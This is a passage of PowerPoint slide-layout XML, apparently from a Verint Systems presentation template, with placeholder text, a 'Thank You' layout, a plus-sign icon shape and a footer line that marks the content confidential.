                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="109"/>
                  <a:pt x="177" y="100"/>
                  <a:pt x="177" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="78"/>
                  <a:pt x="168" y="69"/>
                  <a:pt x="157" y="69"/>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 name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487054" y="3668215"/>
            <a:ext cx="11217896" cy="742825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="2800" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487052" y="2331721"/>
            <a:ext cx="11217897" cy="1145361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="3600" b="0" kern="1200" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit cover title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="6356352"/>
            <a:ext cx="11234056" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507999" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914354"/>
            <a:fld id="{C87E8D51-AD08-48EE-84A7-E19A6D3C2143}" type="slidenum">
              <a:rPr lang="en-US" sz="800" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr defTabSz="914354"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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82848" y="6483375"/>
            <a:ext cx="759208" cy="178814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5932943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White Layout">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1117600" y="2252135"/>
            <a:ext cx="9956800" cy="2353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6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447498" y="-2"/>
            <a:ext cx="3665538" cy="1885952"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498225" y="2089107"/>
            <a:ext cx="3198813" cy="1754187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18416215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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="68580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0" y="3064698"/>
            <a:ext cx="12192001" cy="728604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="5333" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 2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53765" y="831413"/>
            <a:ext cx="1310450" cy="308646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16271035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ver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A337BF8-F9B9-4FE3-A6D6-06215959D192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="screen">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:srgbClr val="D9C3A5">
                <a:tint val="50000"/>
                <a:satMod val="180000"/>
              </a:srgbClr>
            </a:duotone>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="364" t="11735" r="3135"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487051" y="492232"/>
            <a:ext cx="11217897" cy="5760414"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20041"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Diagonal Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="487050" y="492232"/>
            <a:ext cx="11217897" cy="5760414"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 20135"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="6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
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="487052" y="492232"/>
            <a:ext cx="457086" cy="459875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 157 w 177"/>
              <a:gd name="T1" fmla="*/ 69 h 178"/>
              <a:gd name="T2" fmla="*/ 108 w 177"/>
              <a:gd name="T3" fmla="*/ 69 h 178"/>
              <a:gd name="T4" fmla="*/ 108 w 177"/>
              <a:gd name="T5" fmla="*/ 20 h 178"/>
              <a:gd name="T6" fmla="*/ 88 w 177"/>
              <a:gd name="T7" fmla="*/ 0 h 178"/>
              <a:gd name="T8" fmla="*/ 68 w 177"/>
              <a:gd name="T9" fmla="*/ 20 h 178"/>
              <a:gd name="T10" fmla="*/ 68 w 177"/>
              <a:gd name="T11" fmla="*/ 69 h 178"/>
              <a:gd name="T12" fmla="*/ 20 w 177"/>
              <a:gd name="T13" fmla="*/ 69 h 178"/>
              <a:gd name="T14" fmla="*/ 0 w 177"/>
              <a:gd name="T15" fmla="*/ 89 h 178"/>
              <a:gd name="T16" fmla="*/ 20 w 177"/>
              <a:gd name="T17" fmla="*/ 109 h 178"/>
              <a:gd name="T18" fmla="*/ 68 w 177"/>
              <a:gd name="T19" fmla="*/ 109 h 178"/>
              <a:gd name="T20" fmla="*/ 68 w 177"/>
              <a:gd name="T21" fmla="*/ 158 h 178"/>
              <a:gd name="T22" fmla="*/ 88 w 177"/>
              <a:gd name="T23" fmla="*/ 178 h 178"/>
              <a:gd name="T24" fmla="*/ 108 w 177"/>
              <a:gd name="T25" fmla="*/ 158 h 178"/>
              <a:gd name="T26" fmla="*/ 108 w 177"/>
              <a:gd name="T27" fmla="*/ 109 h 178"/>
              <a:gd name="T28" fmla="*/ 157 w 177"/>
              <a:gd name="T29" fmla="*/ 109 h 178"/>
              <a:gd name="T30" fmla="*/ 177 w 177"/>
              <a:gd name="T31" fmla="*/ 89 h 178"/>
              <a:gd name="T32" fmla="*/ 157 w 177"/>
              <a:gd name="T33" fmla="*/ 6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7" h="178">
                <a:moveTo>
                  <a:pt x="157" y="69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="9"/>
                  <a:pt x="99" y="0"/>
                  <a:pt x="88" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="0"/>
                  <a:pt x="68" y="9"/>
                  <a:pt x="68" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="69"/>
                  <a:pt x="0" y="78"/>
                  <a:pt x="0" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100"/>
                  <a:pt x="9" y="109"/>
                  <a:pt x="20" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="169"/>
                  <a:pt x="77" y="178"/>
                  <a:pt x="88" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="178"/>
                  <a:pt x="108" y="169"/>
                  <a:pt x="108" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="109"/>
                  <a:pt x="177" y="100"/>
                  <a:pt x="177" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="78"/>
                  <a:pt x="168" y="69"/>
                  <a:pt x="157" y="69"/>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 name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487054" y="3668215"/>
            <a:ext cx="11217896" cy="742825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="2800" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487052" y="2331721"/>
            <a:ext cx="11217897" cy="1145361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="3600" b="0" kern="1200" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
